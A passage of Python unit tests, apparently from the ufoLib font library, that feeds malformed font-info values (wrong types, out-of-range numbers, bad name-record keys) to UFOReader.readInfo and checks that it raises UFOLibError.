self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# descender
info = dict(fontInfoVersion3)
info["descender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# xHeight
info = dict(fontInfoVersion3)
info["xHeight"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# capHeight
info = dict(fontInfoVersion3)
info["capHeight"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# ascender
info = dict(fontInfoVersion3)
info["ascender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# italicAngle
info = dict(fontInfoVersion3)
info["italicAngle"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
def testGaspRead(self):
# not a list
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# empty list
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = []
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
# not a dict
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = ["abc"]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# dict not properly formatted
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = [dict(rangeMaxPPEM=0xFFFF, notTheRightKey=1)]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = [dict(notTheRightKey=1, rangeGaspBehavior=[0])]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# not an int for ppem
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = [dict(rangeMaxPPEM="abc", rangeGaspBehavior=[0]), dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0])]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# not a list for behavior
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = [dict(rangeMaxPPEM=10, rangeGaspBehavior="abc"), dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0])]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# invalid behavior value
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = [dict(rangeMaxPPEM=10, rangeGaspBehavior=[-1]), dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0])]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# not sorted
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = [dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0]), dict(rangeMaxPPEM=10, rangeGaspBehavior=[0])]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# no 0xFFFF
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = [dict(rangeMaxPPEM=10, rangeGaspBehavior=[0]), dict(rangeMaxPPEM=20, rangeGaspBehavior=[0])]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
def testHeadRead(self):
# openTypeHeadCreated
## not a string
info = dict(fontInfoVersion3)
info["openTypeHeadCreated"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## invalid format
info = dict(fontInfoVersion3)
info["openTypeHeadCreated"] = "2000-Jan-01 00:00:00"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeHeadLowestRecPPEM
info = dict(fontInfoVersion3)
info["openTypeHeadLowestRecPPEM"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeHeadLowestRecPPEM"] = -1
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeHeadFlags
info = dict(fontInfoVersion3)
info["openTypeHeadFlags"] = [-1]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
def testHheaRead(self):
# openTypeHheaAscender
info = dict(fontInfoVersion3)
info["openTypeHheaAscender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeHheaDescender
info = dict(fontInfoVersion3)
info["openTypeHheaDescender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeHheaLineGap
info = dict(fontInfoVersion3)
info["openTypeHheaLineGap"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeHheaCaretSlopeRise
info = dict(fontInfoVersion3)
info["openTypeHheaCaretSlopeRise"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeHheaCaretSlopeRun
info = dict(fontInfoVersion3)
info["openTypeHheaCaretSlopeRun"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeHheaCaretOffset
info = dict(fontInfoVersion3)
info["openTypeHheaCaretOffset"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
def testNameRead(self):
# openTypeNameDesigner
info = dict(fontInfoVersion3)
info["openTypeNameDesigner"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameDesignerURL
info = dict(fontInfoVersion3)
info["openTypeNameDesignerURL"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameManufacturer
info = dict(fontInfoVersion3)
info["openTypeNameManufacturer"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameManufacturerURL
info = dict(fontInfoVersion3)
info["openTypeNameManufacturerURL"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameLicense
info = dict(fontInfoVersion3)
info["openTypeNameLicense"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameLicenseURL
info = dict(fontInfoVersion3)
info["openTypeNameLicenseURL"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameVersion
info = dict(fontInfoVersion3)
info["openTypeNameVersion"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameUniqueID
info = dict(fontInfoVersion3)
info["openTypeNameUniqueID"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameDescription
info = dict(fontInfoVersion3)
info["openTypeNameDescription"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNamePreferredFamilyName
info = dict(fontInfoVersion3)
info["openTypeNamePreferredFamilyName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNamePreferredSubfamilyName
info = dict(fontInfoVersion3)
info["openTypeNamePreferredSubfamilyName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameCompatibleFullName
info = dict(fontInfoVersion3)
info["openTypeNameCompatibleFullName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameSampleText
info = dict(fontInfoVersion3)
info["openTypeNameSampleText"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameWWSFamilyName
info = dict(fontInfoVersion3)
info["openTypeNameWWSFamilyName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameWWSSubfamilyName
info = dict(fontInfoVersion3)
info["openTypeNameWWSSubfamilyName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameRecords
## not a list
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## not a dict
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = ["abc"]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## invalid dict structure
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [dict(foo="bar")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## incorrect keys
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, encodingID=1, languageID=1, string="Name Record.", foo="bar")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(platformID=1, encodingID=1, languageID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, encodingID=1, languageID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, languageID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, encodingID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, encodingID=1, languageID=1)
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## invalid values
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID="1", platformID=1, encodingID=1, languageID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID="1", encodingID=1, languageID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, encodingID="1", languageID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, encodingID=1, languageID="1", string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, encodingID=1, languageID=1, string=1)
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## duplicate
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, encodingID=1, languageID=1, string="Name Record."),
dict(nameID=1, platformID=1, encodingID=1, languageID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
def testOS2Read(self):
# openTypeOS2WidthClass
## not an int
info = dict(fontInfoVersion3)
info["openTypeOS2WidthClass"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## out or range
info = dict(fontInfoVersion3)
info["openTypeOS2WidthClass"] = 15
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2WeightClass
info = dict(fontInfoVersion3)
## not an int
info["openTypeOS2WeightClass"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## out of range
info["openTypeOS2WeightClass"] = -50
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2Selection
info = dict(fontInfoVersion3)
info["openTypeOS2Selection"] = [-1]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2VendorID
info = dict(fontInfoVersion3)
info["openTypeOS2VendorID"] = 1234
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2Panose
## not an int
info = dict(fontInfoVersion3)
info["openTypeOS2Panose"] = [0, 1, 2, 3, 4, 5, 6, 7, 8, str(9)]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## negative
info = dict(fontInfoVersion3)
info["openTypeOS2Panose"] = [0, 1, 2, 3, 4, 5, 6, 7, 8, -9]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## too few values
info = dict(fontInfoVersion3)
info["openTypeOS2Panose"] = [0, 1, 2, 3]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
info["openTypeOS2Panose"] = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2FamilyClass
## not an int
info = dict(fontInfoVersion3)
info["openTypeOS2FamilyClass"] = [1, str(1)]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## too few values
info = dict(fontInfoVersion3)
info["openTypeOS2FamilyClass"] = [1]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
info["openTypeOS2FamilyClass"] = [1, 1, 1]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## out of range
info = dict(fontInfoVersion3)
info["openTypeOS2FamilyClass"] = [1, 201]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2UnicodeRanges
## not an int
info = dict(fontInfoVersion3)
info["openTypeOS2UnicodeRanges"] = ["0"]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## out of range
info = dict(fontInfoVersion3)
info["openTypeOS2UnicodeRanges"] = [-1]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2CodePageRanges
## not an int
info = dict(fontInfoVersion3)
info["openTypeOS2CodePageRanges"] = ["0"]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## out of range
info = dict(fontInfoVersion3)
info["openTypeOS2CodePageRanges"] = [-1]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2TypoAscender
info = dict(fontInfoVersion3)
info["openTypeOS2TypoAscender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2TypoDescender
info = dict(fontInfoVersion3)
info["openTypeOS2TypoDescender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2TypoLineGap
info = dict(fontInfoVersion3)
info["openTypeOS2TypoLineGap"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2WinAscent
info = dict(fontInfoVersion3)
info["openTypeOS2WinAscent"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeOS2WinAscent"] = -1
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2WinDescent
info = dict(fontInfoVersion3)
info["openTypeOS2WinDescent"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeOS2WinDescent"] = -1
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2Type
## not an int
info = dict(fontInfoVersion3)
info["openTypeOS2Type"] = ["1"]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## out of range
info = dict(fontInfoVersion3)
info["openTypeOS2Type"] = [-1]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SubscriptXSize
info = dict(fontInfoVersion3)
info["openTypeOS2SubscriptXSize"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SubscriptYSize
info = dict(fontInfoVersion3)
info["openTypeOS2SubscriptYSize"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SubscriptXOffset
info = dict(fontInfoVersion3)
info["openTypeOS2SubscriptXOffset"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SubscriptYOffset
info = dict(fontInfoVersion3)
info["openTypeOS2SubscriptYOffset"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SuperscriptXSize
info = dict(fontInfoVersion3)
info["openTypeOS2SuperscriptXSize"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SuperscriptYSize
info = dict(fontInfoVersion3)
info["openTypeOS2SuperscriptYSize"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SuperscriptXOffset
info = dict(fontInfoVersion3)
info["openTypeOS2SuperscriptXOffset"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SuperscriptYOffset
info = dict(fontInfoVersion3)
info["openTypeOS2SuperscriptYOffset"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2StrikeoutSize
info = dict(fontInfoVersion3)
info["openTypeOS2StrikeoutSize"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2StrikeoutPosition
info = dict(fontInfoVersion3)
info["openTypeOS2StrikeoutPosition"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
def testVheaRead(self):
# openTypeVheaVertTypoAscender
info = dict(fontInfoVersion3)
info["openTypeVheaVertTypoAscender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeVheaVertTypoDescender
info = dict(fontInfoVersion3)
info["openTypeVheaVertTypoDescender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeVheaVertTypoLineGap
info = dict(fontInfoVersion3)
info["openTypeVheaVertTypoLineGap"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeVheaCaretSlopeRise
info = dict(fontInfoVersion3)
info["openTypeVheaCaretSlopeRise"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeVheaCaretSlopeRun
info = dict(fontInfoVersion3)
info["openTypeVheaCaretSlopeRun"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeVheaCaretOffset
info = dict(fontInfoVersion3)
info["openTypeVheaCaretOffset"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
def testFONDRead(self):
# macintoshFONDFamilyID
info = dict(fontInfoVersion3)
info["macintoshFONDFamilyID"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# macintoshFONDName
info = dict(fontInfoVersion3)
info["macintoshFONDName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
def testPostscriptRead(self):
# postscriptFontName
info = dict(fontInfoVersion3)
info["postscriptFontName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# postscriptFullName
info = dict(fontInfoVersion3)
info["postscriptFullName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# postscriptSlantAngle
info = dict(fontInfoVersion3)
info["postscriptSlantAngle"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# postscriptUniqueID
info = dict(fontInfoVersion3)
info["postscriptUniqueID"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptUnderlineThickness
info = dict(fontInfoVersion3)
info["postscriptUnderlineThickness"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptUnderlinePosition
info = dict(fontInfoVersion3)
info["postscriptUnderlinePosition"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptIsFixedPitch
info = dict(fontInfoVersion3)
info["postscriptIsFixedPitch"] = 2
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptBlueValues
## not a list
info = dict(fontInfoVersion3)
info["postscriptBlueValues"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## uneven value count
info = dict(fontInfoVersion3)
info["postscriptBlueValues"] = [500]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
info["postscriptBlueValues"] = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptOtherBlues
## not a list
info = dict(fontInfoVersion3)
info["postscriptOtherBlues"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## uneven value count
info = dict(fontInfoVersion3)
info["postscriptOtherBlues"] = [500]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
info["postscriptOtherBlues"] = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptFamilyBlues
## not a list
info = dict(fontInfoVersion3)
info["postscriptFamilyBlues"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## uneven value count
info = dict(fontInfoVersion3)
info["postscriptFamilyBlues"] = [500]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
info["postscriptFamilyBlues"] = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptFamilyOtherBlues
## not a list
info = dict(fontInfoVersion3)
info["postscriptFamilyOtherBlues"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## uneven value count
info = dict(fontInfoVersion3)
info["postscriptFamilyOtherBlues"] = [500]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
info["postscriptFamilyOtherBlues"] = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptStemSnapH
## not list
info = dict(fontInfoVersion3)
info["postscriptStemSnapH"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
